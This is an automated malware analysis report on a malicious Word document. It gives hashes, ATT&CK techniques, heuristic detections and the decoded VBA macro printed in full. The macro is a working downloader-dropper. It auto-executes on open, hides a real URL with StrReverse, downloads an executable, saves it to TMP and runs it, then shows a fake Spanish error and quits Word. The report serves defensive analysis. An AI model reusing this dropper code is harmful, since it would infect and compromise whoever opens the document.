Office (OLE) malware analysis — malicious · 0ff9062246c9c65f

MALICIOUS

Office (OLE)

520.0 KB Created: 2009-03-30 14:18:00 Authoring application: Microsoft Office Word First seen: 2014-07-20

MD5: 7c0c98b9c4aba1c11f2130d4f4ba2eef SHA-1: b9267a106e6998a06d2eeb6d9381350a0882036c SHA-256: 0ff9062246c9c65f6a73dc7d7a2ce7b45b934c605656d5303e0c99ea15c1d47a

404 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that attempt to download and execute a file from the URL http://piap.cl/cra/wp/ss.exe. The document body provides a fake guide to enable macros, further encouraging user interaction. The script uses the URLDownloadToFile API and creates a temporary file to run the downloaded executable.

Heuristics 15

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 10 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Shell FullSavePath, vbNormalFocus
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    ADS.Write XML.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set XML = CreateObject("Microsoft.XMLHTTP")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Private Sub AutoOpen()
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Private Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    FullSavePath = Environ(SavePath) & "\" & SaveName
```
URL de-obfuscated from VBA string literal (1 URL) info OLE_VBA_OBFUSCATED_URL

A VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime — junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://piap.cl/cra/wp/ss.exe Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1824 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1824 bytes
SHA-256: `2b7c950f8afc23088cbc268052cdc9ab7e7020eff10182d9b0b620eb738c06e6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Auto_Open() Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe") End Sub Private Sub Workbook_Open() Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe") End Sub Private Sub AutoExec() Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe") End Sub Private Sub AutoOpen() Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe") End Sub Private Sub Document_Open() Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe") End Sub Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False) On Error Resume Next Err.Clear Set XML = CreateObject("Microsoft.XMLHTTP") Set ADS = CreateObject("ADODB.Stream") XML.Open "GET", URL, False XML.send XML.getAllResponseHeaders FullSavePath = Environ(SavePath) & "\" & SaveName ADS.Open ADS.Type = 1 ADS.Write XML.responseBody ADS.SaveToFile FullSavePath, 2 Shell FullSavePath, vbNormalFocus DownloadFile = True MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error" Dim z z = 0 Do While 1 = 1 If z = 2 Then Application.DisplayAlerts = False Application.Quit End If z = z + 1 Loop End Function

SHA-256: 2b7c950f8afc23088cbc268052cdc9ab7e7020eff10182d9b0b620eb738c06e6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Auto_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
End Sub
Private Sub Workbook_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
End Sub
Private Sub AutoExec()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
End Sub
Private Sub AutoOpen()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
End Sub
Private Sub Document_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
End Sub
Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
    On Error Resume Next
    Err.Clear

    Set XML = CreateObject("Microsoft.XMLHTTP")
    Set ADS = CreateObject("ADODB.Stream")
 
    XML.Open "GET", URL, False
    XML.send
 
    XML.getAllResponseHeaders
 
    FullSavePath = Environ(SavePath) & "\" & SaveName

    ADS.Open
    ADS.Type = 1
    ADS.Write XML.responseBody
    ADS.SaveToFile FullSavePath, 2

    Shell FullSavePath, vbNormalFocus
    DownloadFile = True
    MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
    Dim z
    z = 0
    Do While 1 = 1
    If z = 2 Then
    Application.DisplayAlerts = False
    Application.Quit
    End If
    z = z + 1
    Loop
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.